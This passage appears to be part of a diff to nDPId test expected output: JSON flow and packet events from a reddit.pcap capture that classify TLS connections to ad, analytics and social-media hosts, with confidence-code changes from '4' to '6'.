Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}} +01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01459{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688324,"flow_last_seen":1605291688324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688324,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605291688324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688324,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjQAAAAAoAL9INe7AAACBAWgBAIICn8mSwwAAAAAAQMDBw=="} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688336,"flow_last_seen":1605291688336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688336,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -228,33 +228,33 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605291688344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688344,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACgGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmAAAAAAoAL9ICpwAAACBAWgBAIICgi3lpgAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605291688365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688365,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnC63k25KV6Y1oBJXgLbhAAACBAV4AQMDAwQCCArC10GYfyZLDA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1605291688365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688365,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjUut5NvgBAB+zrKAAABAQgKfyZLNcLXQZg="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605291688370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688370,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnlMkjxA2CKc5oBJXgKoEAAACBAV4AQMDAwQCCArC10GjfyZLGA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605291688370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688370,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzlTJI8RgBAB+y30AAABAQgKfyZLOsLXQaM="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605291688371,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688371,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAkAAhnO4AAAZE4\/jAk6EqAcsBIEmLB5kd7IUo3\/YpAbvbeuzTe9OJtD5hoBJXgGMHAAACBAV4AQMDAwQCCArC10GlCLeWmA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605291688371,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688371,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACAGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmHs03vUgBAB++b9AAABAQgKCLeWs8LXQaU="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 